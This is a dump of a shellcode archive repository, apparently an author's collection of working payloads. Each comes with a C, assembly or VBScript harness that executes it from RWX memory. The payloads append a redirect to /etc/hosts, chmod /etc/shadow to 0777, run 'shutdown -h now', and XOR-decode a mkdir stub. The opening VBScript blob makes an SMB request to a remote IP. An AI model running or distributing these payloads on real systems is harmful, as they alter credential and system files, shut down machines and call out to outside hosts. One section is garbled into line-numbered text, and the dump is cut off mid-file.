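&H53, &H31, &H4b, &He8, &H4e, &H05, &H05, &H05, &Hb9, &Hac, &Hd5, &Haa, &H88, &H8b, &Hf0, &He8, &H42, &H05, &H05, &H05, _
&H6a, &H05, &H68, &H80, &H05, &H05, &H05, &H6a, &H03, &H6a, &H05, &H6a, &H01, &H68, &H05, &H05, &H05, &H80, &H68, &H3e, _
&H01, &H05, &H05, &Hff, &Hd0, &H6a, &H05, &Hff, &Hd6, &H33, &Hc0, &H5e, &Hc3, &H33, &Hd2, &Heb, &H10, &Hc1, &Hca, &H0d, _
&H3c, &H61, &H0f, &Hbe, &Hc0, &H7c, &H03, &H83, &He8, &H20, &H03, &Hd0, &H41, &H8a, &H01, &H84, &Hc0, &H75, &Hea, &H8b, _
&Hc2, &Hc3, &H8d, &H41, &Hf8, &Hc3, &H55, &H8b, &Hec, &H83, &Hec, &H14, &H53, &H56, &H57, &H89, &H4d, &Hf4, &H64, &Ha1, _
&H30, &H05, &H05, &H05, &H89, &H45, &Hfc, &H8b, &H45, &Hfc, &H8b, &H40, &H0c, &H8b, &H40, &H14, &H89, &H45, &Hec, &H8b, _
&Hf8, &H8b, &Hcf, &He8, &Hd2, &Hff, &Hff, &Hff, &H8b, &H70, &H18, &H8b, &H3f, &H85, &Hf6, &H74, &H4f, &H8b, &H46, &H3c, _
&H8b, &H5c, &H30, &H78, &H85, &Hdb, &H74, &H44, &H8b, &H4c, &H33, &H0c, &H03, &Hce, &He8, &H96, &Hff, &Hff, &Hff, &H8b, _
&H4c, &H33, &H20, &H89, &H45, &Hf8, &H33, &Hc0, &H03, &Hce, &H89, &H4d, &Hf0, &H89, &H45, &Hfc, &H39, &H44, &H33, &H18, _
&H76, &H22, &H8b, &H0c, &H81, &H03, &Hce, &He8, &H75, &Hff, &Hff, &Hff, &H03, &H45, &Hf8, &H39, &H45, &Hf4, &H74, &H1c, _
&H8b, &H45, &Hfc, &H8b, &H4d, &Hf0, &H40, &H89, &H45, &Hfc, &H3b, &H44, &H33, &H18, &H72, &Hde, &H3b, &H7d, &Hec, &H75, _
&H9c, &H33, &Hc0, &H5f, &H5e, &H5b, &Hc9, &Hc3, &H8b, &H4d, &Hfc, &H8b, &H44, &H33, &H24, &H8d, &H04, &H48, &H0f, &Hb7, _
&H0c, &H30, &H8b, &H44, &H33, &H1c, &H8d, &H04, &H88, &H8b, &H04, &H30, &H03, &Hc6, &Heb, &Hdf, &H21, &H05, &H05, &H05, _
&H50, &H05, &H05, &H05, &H6b, &H65, &H72, &H6e, &H65, &H6c, &H33, &H32, &H2e, &H64, &H6c, &H6c, &H05, &H2f, &H2f, &H33, _
&H35, &H2e, &H31, &H36, &H34, &H2e, &H31, &H35, &H33, &H2e, &H32, &H32, &H34, &H2f, &H61, &H61, &H05)

' UBound is the last index, not the count: allocate UBound - LBound + 1 bytes
' so the copy below never exceeds the requested size.
scLocation = DX.VirtualAlloc(0, UBound(shellcode) - LBound(shellcode) + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE)

For i = LBound(shellcode) To UBound(shellcode)
    DX.NumPut shellcode(i), scLocation, i
Next

thread = DX.CreateThread(0, 0, scLocation, 0, 0)
' Registered above but never called in the original: when the script ends the
' host exits and kills the thread, possibly before the SMB request goes out.
' A finite Long timeout keeps the "u" argument conversion unambiguous.
DX.WaitForSingleObject thread, 60000

--------------------------------------------------------------------------------
/Hosts.c:
--------------------------------------------------------------------------------
/*
; Title: Add map in /etc/hosts file - 110 bytes
; Date: 2014-10-29
; Platform: linux/x86_64
; Website: http://osandamalith.wordpress.com
; Author: Osanda Malith Jayathissa (@OsandaMalith)

global _start
section .text

_start:
    ;open
    xor rax, rax
    add rax, 2                      ; open syscall
    xor rdi, rdi
    xor rsi, rsi
    push rsi                        ; 0x00 terminator
    mov r8, 0x2f2f2f2f6374652f      ; "/etc////"
    mov r10, 0x7374736f682f2f2f     ; "///hosts"
    push r10
    push r8                         ; rsp -> "/etc///////hosts"
    add rdi, rsp
    xor rsi, rsi
    add si, 0x401                   ; O_WRONLY | O_APPEND
    syscall

    ;write
    xchg rax, rdi                   ; fd -> rdi
    xor rax, rax
    add rax, 1                      ; syscall for write
    jmp data

write:
    pop rsi                         ; rsi -> text
    mov dl, 19                      ; length in rdx (low byte only, see note)
    syscall

    ;close
    xor rax, rax
    add rax, 3
    syscall

    ;exit
    xor rax, rax
    mov al, 60
    xor rdi, rdi
    syscall

data:
    call write
    text db '127.1.1.1 google.lk'

Review notes:
 - `mov dl, 19` sets only the low byte of rdx. Launched from the harness below,
   rdx holds whatever the C runtime left in it, so the write() count is not
   guaranteed to be 19; a `xor edx, edx` (2 bytes, no NUL) in front of it would
   make the count deterministic. The bytes below are the author's 110-byte
   build and have not been re-encoded.
 - The text carries no newline: if /etc/hosts does not already end in '\n'
   the entry is glued onto its last line. Opening the file for writing needs
   root.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x02\x48"
                       "\x31\xff\x48\x31\xf6\x56\x49\xb8"
                       "\x2f\x65\x74\x63\x2f\x2f\x2f\x2f"
                       "\x49\xba\x2f\x2f\x2f\x68\x6f\x73"
                       "\x74\x73\x41\x52\x41\x50\x48\x01"
                       "\xe7\x48\x31\xf6\x66\x81\xc6\x01"
                       "\x04\x0f\x05\x48\x97\x48\x31\xc0"
                       "\x48\x83\xc0\x01\xeb\x18\x5e\xb2"
                       "\x13\x0f\x05\x48\x31\xc0\x48\x83"
                       "\xc0\x03\x0f\x05\x48\x31\xc0\xb0"
                       "\x3c\x48\x31\xff\x0f\x05\xe8\xe3"
                       "\xff\xff\xff\x31\x32\x37\x2e\x31"
                       "\x2e\x31\x2e\x31\x20\x67\x6f\x6f"
                       "\x67\x6c\x65\x2e\x6c\x6b";

/*
 * Copy the blob into a fresh RWX anonymous mapping and call it.
 *
 * Calling the .data array directly (the classic harness) relied on
 * `-z execstack` making every readable page executable; 64-bit kernels no
 * longer grant that, so the direct call faults. An explicit mapping works
 * regardless of linker flags.
 */
static void run_shellcode(const unsigned char *sc, size_t len) {
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }
    memcpy(mem, sc, len);
    ((void (*)(void))mem)();
}

int main(void) {
    /* sizeof minus the implicit NUL: 110, independent of strlen(). */
    const size_t len = sizeof code - 1;

    printf("Shellcode Length: %zu\n", len);
    run_shellcode(code, len);   /* the payload calls exit(0); not expected to return */
    return 0;
}
/*EOF*/

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
Shellcodes
==========

My Shellcode Archive

These samples are live: they append to `/etc/hosts`, `chmod` `/etc/shadow`,
issue SMB requests to remote hosts, and so on. Build and run them only inside
a disposable VM you are authorised to use.

--------------------------------------------------------------------------------
/VBShellCode Demo/shellcode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OsandaMalith/Shellcodes/b8b356c358812b02668f2d5780b5abfb99b86b9d/VBShellCode Demo/shellcode.exe

--------------------------------------------------------------------------------
/chmod777.c:
--------------------------------------------------------------------------------
/*
; Title: chmod 0777 /etc/shadow Polymorphic Shellcode - 51 Bytes
; Platform: linux/x86
; Date: 2014-06-22
; Author: Osanda Malith Jayathissa (@OsandaMalith)

section .text
global _start

_start:
    mov ebx, eax
    xor eax, ebx                    ; eax = 0 whatever it held
    push dword eax                  ; NUL terminator
    mov esi, 0x563a1f3e
    add esi, 0x21354523             ; = 0x776f6461 "adow"
    mov dword [esp-4], esi
    mov dword [esp-8], 0x68732f2f   ; "//sh"
    mov dword [esp-12], 0x6374652f  ; "/etc"
    sub esp, 12
    mov ebx, esp                    ; ebx -> "/etc//shadow"
    push word 0x1ff
    pop cx                          ; mode 0777 (only the low 16 bits of ecx)
    mov al, 0xf                     ; chmod
    int 0x80

Review notes:
 - Only cx is set, so the upper half of ecx is whatever it was; Linux masks
   the mode to its permission bits, so stray high bits do not change the
   result.
 - Unlike the other samples there is no exit afterwards: execution falls off
   the end of the blob into whatever follows it, so expect a crash right after
   the chmod. 32-bit code -- build with -m32. Needs root to succeed.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

unsigned char code[] = \
"\x89\xc3\x31\xd8\x50\xbe\x3e\x1f"
"\x3a\x56\x81\xc6\x23\x45\x35\x21"
"\x89\x74\x24\xfc\xc7\x44\x24\xf8"
"\x2f\x2f\x73\x68\xc7\x44\x24\xf4"
"\x2f\x65\x74\x63\x83\xec\x0c\x89"
"\xe3\x66\x68\xff\x01\x66\x59\xb0"
"\x0f\xcd\x80";

/*
 * Copy the blob into a fresh RWX anonymous mapping and call it, so the
 * harness does not depend on `-z execstack` making .data executable.
 */
static void run_shellcode(const unsigned char *sc, size_t len) {
    void *mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        exit(EXIT_FAILURE);
    }
    memcpy(mem, sc, len);
    ((void (*)(void))mem)();
}

int main(void) {
    /* sizeof minus the implicit NUL: 51, independent of strlen(). */
    const size_t len = sizeof code - 1;

    printf("Shellcode Length: %zu\n", len);
    run_shellcode(code, len);   /* no exit in the payload; see the note above */

    return 0;
}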
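--------------------------------------------------------------------------------
/desktopscroll.c:
--------------------------------------------------------------------------------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Title: Shellcode to scroll your desktop horizontally
 * Author: Osanda Malith Jayathissa (@OsandaMalith)
 * Website: https://osandamalith.com
 * This was strictly made for fun :)
 *
 * 675 bytes. The same 34-byte stub as CreateFile.c decodes the remaining
 * 641 bytes in place (here the placeholder is 0x06 -> 0x00), then the payload
 * loads kernel32.dll, gdi32.dll and user32.dll (the three names at the end),
 * resolves a set of APIs by hash and returns normally. Because the stub writes
 * to itself the page must be RWX.
 */

int main(void) {
    static unsigned char shellcode[] =
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\x80\x03\x01\x01\x81\xf1\x01\x01"
        "\x01\x01\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x06\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x06\x06\x06\x06\x5e\x8b\xfe\x81\xc6\x4e\x02\x06\x06"
        "\xb9\x03\x06\x06\x06\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
        "\xec\x30\x53\x56\x57\xb9\x8d\x10\xb7\xf8\xe8\x7c\x01\x06\x06\x8b"
        "\xf0\x68\x5a\x02\x06\x06\xff\xd6\x68\x67\x02\x06\x06\xff\xd6\x68"
        "\x71\x02\x06\x06\xff\xd6\xb9\xe0\x53\x31\x4b\xe8\x5b\x01\x06\x06"
        "\xb9\x49\x67\xd2\xbe\x89\x45\xd0\xe8\x4e\x01\x06\x06\xb9\xdb\xda"
        "\xeb\xd0\x89\x45\xf8\xe8\x41\x01\x06\x06\xb9\x4c\x0c\x02\xae\x89"
        "\x45\xf4\xe8\x34\x01\x06\x06\xb9\xa7\x0b\x59\x08\x89\x45\xd4\xe8"
        "\x27\x01\x06\x06\xb9\xaa\xf7\xb4\x69\x89\x45\xe8\xe8\x1a\x01\x06"
        "\x06\xb9\xda\x7c\x54\xcb\x8b\xf8\xe8\x0e\x01\x06\x06\xb9\x13\xd4"
        "\x9b\xc3\x8b\xd8\xe8\x02\x01\x06\x06\xb9\xe2\x9d\x97\xbc\x89\x45"
        "\xf0\xe8\xf5\x06\x06\x06\xb9\x33\xd6\x41\xc3\x89\x45\xe4\xe8\xe8"
        "\x06\x06\x06\xb9\x0f\xa4\xbf\xd1\x89\x45\xe0\xe8\xdb\x06\x06\x06"
        "\xb9\x32\xe6\xd6\x1c\x89\x45\xd8\xe8\xce\x06\x06\x06\x6a\x06\x8b"
        "\xf0\xff\x55\xf8\x6a\x06\x89\x45\xec\xff\xd7\x6a\x01\x89\x45\xf8"
        "\xff\xd7\x8b\x4d\xf8\x8b\x7d\xec\x50\x03\xc9\x51\x57\x89\x45\xfc"
        "\xff\xd3\x8b\xd8\x57\x89\x5d\xec\xff\xd6\x8b\xf0\x53\x56\xff\x55"
        "\xf0\x8b\x5d\xf8\x68\x20\x06\xcc\x06\x89\x45\xdc\x33\xc0\x50\x50"
        "\x57\xff\x75\xfc\x53\x50\x50\x56\xff\x55\xf4\x68\x20\x06\xcc\x06"
        "\x33\xc0\x50\x50\x57\xff\x75\xfc\x53\x50\x53\x56\xff\x55\xf4\x68"
        "\x20\x06\xcc\x06\x33\xc0\x50\x53\x56\xff\x75\xfc\xff\x75\xf8\x50"
        "\x50\x57\xff\x55\xf4\x6a\x05\xff\x55\xe8\x83\xeb\x08\x79\xe0\x33"
        "\xdb\x53\x57\x6a\x0f\x53\xff\x55\xe4\xff\x75\xec\xff\x55\xe0\xff"
        "\x75\xdc\x56\xff\x55\xf0\x56\xff\x55\xd8\x57\x53\xff\x55\xd4\x53"
        "\xff\x55\xd0\x5f\x5e\x33\xc0\x5b\xc9\xc3\x33\xd2\xeb\x10\xc1\xca"
        "\x0d\x3c\x61\x0f\xbe\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01"
        "\x84\xc0\x75\xea\x8b\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec"
        "\x14\x53\x56\x57\x89\x4d\xf4\x64\xa1\x30\x06\x06\x06\x89\x45\xfc"
        "\x8b\x45\xfc\x8b\x40\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf"
        "\xe8\xd2\xff\xff\xff\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46"
        "\x3c\x8b\x5c\x30\x78\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8"
        "\x96\xff\xff\xff\x8b\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89"
        "\x4d\xf0\x89\x45\xfc\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce"
        "\xe8\x75\xff\xff\xff\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc"
        "\x8b\x4d\xf0\x40\x89\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec"
        "\x75\x9c\x33\xc0\x5f\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24"
        "\x8d\x04\x48\x0f\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04"
        "\x30\x03\xc6\xeb\xdf\x2b\x06\x06\x06\x32\x06\x06\x06\x39\x06\x06"
        "\x06\x6b\x65\x72\x6e\x65\x6c\x33\x32\x2e\x64\x6c\x6c\x06\x67\x64"
        "\x69\x33\x32\x2e\x64\x6c\x6c\x06\x75\x73\x65\x72\x33\x32\x2e\x64"
        "\x6c\x6c\x06";

    /* Exclude the implicit NUL; equals strlen() here (no 0x00 byte in the
     * blob) but does not depend on it. */
    const SIZE_T sc_len = sizeof shellcode - 1;
    DWORD oldProtect;

    wprintf(L"Length : %lu bytes\n@OsandaMalith", (unsigned long)sc_len);

    /* RWX, not RX: the decoder stub writes the decoded bytes back in place. */
    if (!VirtualProtect(shellcode, sc_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        fprintf(stderr, "VirtualProtect failed: %lu\n", GetLastError());
        return EXIT_FAILURE;
    }

    ((void (*)(void))shellcode)();

    VirtualProtect(shellcode, sc_len, oldProtect, &oldProtect);

    return EXIT_SUCCESS;
}

--------------------------------------------------------------------------------
/hosts.asm:
--------------------------------------------------------------------------------
; Append "127.1.1.1 google.lk" to /etc/hosts (linux/x86_64, rel-addressed
; variant of Hosts.c). Needs root. Note that the text has no newline: if
; /etc/hosts does not end in '\n' the entry is glued onto its last line.

section .text
global _start

_start:

    jmp legit_start
    google db "127.1.1.1 google.lk"
    file db "/etc/hosts",0x00

legit_start:

    ; open a file
    xor rax, rax
    add rax, 2              ; open syscall
    xor rdi, rdi
    lea rdi, [rel file]     ; load relative addr of file
    xor rsi, rsi
    add si, 0x401           ; O_WRONLY | O_APPEND
    syscall

    ; write
    xchg rax, rdi           ; fd -> rdi
    xor rax, rax
    add rax, 1              ; syscall for write
    lea rsi, [rel google]
    xor rdx, rdx            ; mov dl only sets the low byte; clear the rest so
                            ; the count is 19 regardless of what rdx held
    mov dl, 19              ; This is the length of the string.
    syscall

    ;close
    xor rax, rax
    add rax, 3
    syscall

    ;exit
    xor rax, rax
    mov al, 60
    xor rdi, rdi
    syscall

--------------------------------------------------------------------------------
/invert.c:
--------------------------------------------------------------------------------
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Title: Shellcode to Invert Colors in your Desktop
 * Author: Osanda Malith Jayathissa (@OsandaMalith)
 * Website: https://osandamalith.com
 * This was strictly made for fun :)
 *
 * 494 bytes. The same 34-byte stub as CreateFile.c decodes the remaining
 * 460 bytes in place (placeholder 0x05 -> 0x00), then the payload loads
 * kernel32.dll, gdi32.dll and user32.dll (the names at the end), resolves a
 * set of APIs by hash, runs a loop ten times (push 10 / pop ebx ... dec ebx /
 * jnz) and returns normally. Because the stub writes to itself the page must
 * be RWX.
 */

int main(void) {
    static unsigned char shellcode[] =
        "\xe8\xff\xff\xff\xff\xc0\x5f\xb9\xce\x03\x02\x02\x81\xf1\x02\x02"
        "\x02\x02\x83\xc7\x1d\x33\xf6\xfc\x8a\x07\x3c\x05\x0f\x44\xc6\xaa"
        "\xe2\xf6\xe8\x05\x05\x05\x05\x5e\x8b\xfe\x81\xc6\x99\x01\x05\x05"
        "\xb9\x03\x05\x05\x05\xfc\xad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83"
        "\xec\x10\x53\x56\x57\xb9\x8d\x10\xb7\xf8\xe8\xc7\x05\x05\x05\x8b"
        "\xf0\x68\xa5\x01\x05\x05\xff\xd6\x68\xb2\x01\x05\x05\xff\xd6\x68"
        "\xbc\x01\x05\x05\xff\xd6\xb9\xe0\x53\x31\x4b\xe8\xa6\x05\x05\x05"
        "\xb9\x49\x67\xd2\xbe\x89\x45\xf0\xe8\x99\x05\x05\x05\xb9\xdb\xda"
        "\xeb\xd0\x8b\xf0\xe8\x8d\x05\x05\x05\xb9\x4c\x0c\x02\xae\x89\x45"
        "\xfc\xe8\x80\x05\x05\x05\xb9\xa7\x0b\x59\x08\x89\x45\xf8\xe8\x73"
        "\x05\x05\x05\xb9\xaa\xf7\xb4\x69\x89\x45\xf4\xe8\x66\x05\x05\x05"
        "\x6a\x0a\x8b\xf8\x5b\x68\x09\x05\x55\x05\x6a\x05\x6a\x05\x6a\x05"
        "\xff\xd6\x50\x6a\x01\xff\xd7\x50\x6a\x05\xff\xd7\x50\x33\xc0\x50"
        "\x50\x50\xff\xd6\x50\xff\x55\xfc\x6a\x05\xff\xd6\x50\x6a\x05\xff"
        "\x55\xf8\x6a\x64\xff\x55\xf4\x4b\x75\xcb\x53\xff\x55\xf0\x5f\x5e"
        "\x33\xc0\x5b\xc9\xc3\x33\xd2\xeb\x10\xc1\xca\x0d\x3c\x61\x0f\xbe"
        "\xc0\x7c\x03\x83\xe8\x20\x03\xd0\x41\x8a\x01\x84\xc0\x75\xea\x8b"
        "\xc2\xc3\x8d\x41\xf8\xc3\x55\x8b\xec\x83\xec\x14\x53\x56\x57\x89"
        "\x4d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfc\x8b\x45\xfc\x8b\x40"
        "\x0c\x8b\x40\x14\x89\x45\xec\x8b\xf8\x8b\xcf\xe8\xd2\xff\xff\xff"
        "\x8b\x70\x18\x8b\x3f\x85\xf6\x74\x4f\x8b\x46\x3c\x8b\x5c\x30\x78"
        "\x85\xdb\x74\x44\x8b\x4c\x33\x0c\x03\xce\xe8\x96\xff\xff\xff\x8b"
        "\x4c\x33\x20\x89\x45\xf8\x33\xc0\x03\xce\x89\x4d\xf0\x89\x45\xfc"
        "\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x75\xff\xff\xff"
        "\x03\x45\xf8\x39\x45\xf4\x74\x1c\x8b\x45\xfc\x8b\x4d\xf0\x40\x89"
        "\x45\xfc\x3b\x44\x33\x18\x72\xde\x3b\x7d\xec\x75\x9c\x33\xc0\x5f"
        "\x5e\x5b\xc9\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48\x0f\xb7"
        "\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6\xeb\xdf"
        "\x2b\x05\x05\x05\x32\x05\x05\x05\x39\x05\x05\x05\x6b\x65\x72\x6e"
        "\x65\x6c\x33\x32\x2e\x64\x6c\x6c\x05\x67\x64\x69\x33\x32\x2e\x64"
        "\x6c\x6c\x05\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x05";

    /* Exclude the implicit NUL; equals strlen() here (no 0x00 byte in the
     * blob) but does not depend on it. */
    const SIZE_T sc_len = sizeof shellcode - 1;
    DWORD oldProtect;

    wprintf(L"Length : %lu bytes\n@OsandaMalith", (unsigned long)sc_len);

    /* RWX, not RX: the decoder stub writes the decoded bytes back in place. */
    if (!VirtualProtect(shellcode, sc_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        fprintf(stderr, "VirtualProtect failed: %lu\n", GetLastError());
        return EXIT_FAILURE;
    }

    ((void (*)(void))shellcode)();

    VirtualProtect(shellcode, sc_len, oldProtect, &oldProtect);

    return EXIT_SUCCESS;
}

--------------------------------------------------------------------------------
/makedir.asm:
--------------------------------------------------------------------------------
; Author: Osanda Malith Jayathissa (@OsandaMalith)
; This makes the syscall 39 and creates a new directory by the 'Osanda' with the chmod 755
;
; Review notes:
;  - The jmp / call / pop pair leaves the address of msg in ebx; the body
;    between `shellcode:` and `call_dir:` is 25 bytes with no 0x00.
;  - msg is NOT NUL-terminated (a 0x00 would break the no-null property), so
;    mkdir() reads past the six bytes into whatever follows the blob. The
;    XOR-encoded copy in makedir_decode.asm fixes this: its last encoded byte
;    0xAA decodes to 0x00 and doubles as the decoder's stop marker.

section .text
global _start

_start:

    jmp short call_dir

shellcode:
    xor eax, eax
    xor ebx, ebx
    xor edx, edx
    xor ecx, ecx
    mov al, 0x27        ; mkdir
    pop ebx             ; ebx -> msg
    mov cx, 0x1ed       ; mode 0755 (ecx was zeroed above)
    int 0x80

    ; exit
    xor eax, eax
    mov al, 0x1
    xor ebx,ebx
    int 0x80
call_dir:
    call shellcode
    msg: db 0x4f,0x73,0x61,0x6e,0x64,0x61

--------------------------------------------------------------------------------
/makedir_decode.asm:
--------------------------------------------------------------------------------
; Author: Osanda Malith Jayathissa (@OsandaMalith)
; This is the XOR decoder stub
;
; Decodes the makedir.asm payload in place: every byte is XORed with 0xAA
; until the result is zero (the trailing 0xAA), then execution continues at
; Shellcode. Two requirements follow from that design:
;  - the payload must be in memory that is both writable and executable;
;  - no encoded byte other than the last may be 0xAA, because a zero result
;    stops the loop early and jumps into half-decoded code.

section .text
global _start

_start:

    jmp short call_decoder

decoder:
    pop esi             ; esi -> Shellcode


decode:
    xor byte [esi], 0xAA
    jz Shellcode        ; decoded 0x00 -> terminator reached
    inc esi
    jmp short decode


call_decoder:

    call decoder
    Shellcode: db 0x41,0xb3,0x9b,0x6a,0x9b,0x71,0x9b,0x78,0x9b,0x63,0x1a,0x8d,0xf1,0xcc,0x13,0x47,0xab,0x67,0x2a,0x9b,0x6a,0x1a,0xab,0x9b,0x71,0x67,0x2a,0x42,0x48,0x55,0x55,0x55,0xe5,0xd9,0xcb,0xc4,0xce,0xcb, 0xaa

--------------------------------------------------------------------------------
/mkdir.c:
--------------------------------------------------------------------------------
/*
; Author: Osanda Malith Jayathissa (@OsandaMalith)
; This makes the syscall 39 and creates a new directory by the 'Osanda' with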
the chmod 755 4 | 5 | section .text 6 | global _start 7 | 8 | _start: 9 | 10 | jmp short call_shellcode 11 | 12 | shellcode: 13 | xor eax, eax 14 | xor ebx, ebx 15 | xor edx, edx 16 | xor ecx, ecx 17 | mov al, 0x27 18 | pop ebx 19 | mov cx, 0x1ed 20 | int 0x80 21 | 22 | ; exit 23 | xor eax, eax 24 | mov al, 0x1 25 | xor ebx,ebx 26 | int 0x80 27 | call_shellcode: 28 | call shellcode 29 | msg: db 0x4f,0x73,0x61,0x6e,0x64,0x61 30 | 31 | 32 | 33 | */ 34 | 35 | /* 36 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 37 | ; This is XOR decoder stub 38 | 39 | section .text 40 | global _start 41 | 42 | _start: 43 | 44 | jmp short call_decoder 45 | 46 | decoder: 47 | pop esi 48 | 49 | 50 | decode: 51 | xor byte [esi], 0xAA 52 | jz Shellcode 53 | inc esi 54 | jmp short decode 55 | 56 | 57 | call_decoder: 58 | 59 | call decoder 60 | Shellcode: db 0x41,0xb3,0x9b,0x6a,0x9b,0x71,0x9b,0x78,0x9b,0x63,0x1a,0x8d,0xf1,0xcc,0x13,0x47,0xab,0x67,0x2a,0x9b,0x6a,0x1a,0xab,0x9b,0x71,0x67,0x2a,0x42,0x48,0x55,0x55,0x55,0xe5,0xd9,0xcb,0xc4,0xce,0xcb, 0xaa 61 | 62 | */ 63 | 64 | /* Author : Osanda Malith Jayathissa (@OsandaMalith) 65 | * gcc -fno-stack-protector -z execstack -o mkdir mkdir.c 66 | */ 67 | 68 | #include 69 | #include 70 | 71 | unsigned char code[] = \ 72 | "\xeb\x09\x5e\x80\x36\xaa\x74\x08\x46\xeb\xf8\xe8\xf2\xff\xff\xff\x41\xb3\x9b\x6a\x9b\x71\x9b\x78\x9b\x63\x1a\x8d\xf1\xcc\x13\x47\xab\x67\x2a\x9b\x6a\x1a\xab\x9b\x71\x67\x2a\x42\x48\x55\x55\x55\xe5\xd9\xcb\xc4\xce\xcb\xaa"; 73 | 74 | main() 75 | { 76 | 77 | printf("Shellcode Length: %d\n", strlen(code)); 78 | 79 | int (*ret)() = (int(*)())code; 80 | 81 | ret(); 82 | 83 | } 84 | -------------------------------------------------------------------------------- /shutdown_x86.c: -------------------------------------------------------------------------------- 1 | /* 2 | ; Title: shutdown -h now Shellcode - 56 bytes 3 | ; Date: 2014-06-27 4 | ; Platform: linux/x86 5 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 6 | 7 | 
Disassembly of section .text: 8 | 9 | 08048060 <_start>: 10 | 8048060: 31 c0 xor eax,eax 11 | 8048062: 31 d2 xor edx,edx 12 | 8048064: 50 push eax 13 | 8048065: 66 68 2d 68 pushw 0x682d 14 | 8048069: 89 e7 mov edi,esp 15 | 804806b: 50 push eax 16 | 804806c: 6a 6e push 0x6e 17 | 804806e: 66 c7 44 24 01 6f 77 mov WORD PTR [esp+0x1],0x776f 18 | 8048075: 89 e7 mov edi,esp 19 | 8048077: 50 push eax 20 | 8048078: 68 64 6f 77 6e push 0x6e776f64 21 | 804807d: 68 73 68 75 74 push 0x74756873 22 | 8048082: 68 6e 2f 2f 2f push 0x2f2f2f6e 23 | 8048087: 68 2f 73 62 69 push 0x6962732f 24 | 804808c: 89 e3 mov ebx,esp 25 | 804808e: 52 push edx 26 | 804808f: 56 push esi 27 | 8048090: 57 push edi 28 | 8048091: 53 push ebx 29 | 8048092: 89 e1 mov ecx,esp 30 | 8048094: b0 0b mov al,0xb 31 | 8048096: cd 80 int 0x80 32 | 33 | */ 34 | 35 | #include 36 | #include 37 | 38 | unsigned char code[] = "\x31\xc0\x31\xd2\x50\x66\x68\x2d" 39 | "\x68\x89\xe7\x50\x6a\x6e\x66\xc7" 40 | "\x44\x24\x01\x6f\x77\x89\xe7\x50" 41 | "\x68\x64\x6f\x77\x6e\x68\x73\x68" 42 | "\x75\x74\x68\x6e\x2f\x2f\x2f\x68" 43 | "\x2f\x73\x62\x69\x89\xe3\x52\x56" 44 | "\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; 45 | 46 | int 47 | main() { 48 | 49 | printf("Shellcode Length: %d\n", (int)strlen(code)); 50 | int (*ret)() = (int(*)())code; 51 | ret(); 52 | 53 | return 0; 54 | } 55 | -------------------------------------------------------------------------------- /shutdown_x86_64.c: -------------------------------------------------------------------------------- 1 | /* 2 | ; Title: shutdown -h now x86_64 Shellcode - 65 bytes 3 | ; Platform: linux/x86_64 4 | ; Date: 2014-06-27 5 | ; Author: Osanda Malith Jayathissa (@OsandaMalith) 6 | 7 | section .text 8 | 9 | global _start 10 | 11 | _start: 12 | 13 | xor rax, rax 14 | xor rdx, rdx 15 | 16 | push rax 17 | push byte 0x77 18 | push word 0x6f6e ; now 19 | mov rbx, rsp 20 | 21 | push rax 22 | push word 0x682d ;-h 23 | mov rcx, rsp 24 | 25 | push rax 26 | mov r8, 0x2f2f2f6e6962732f ; 
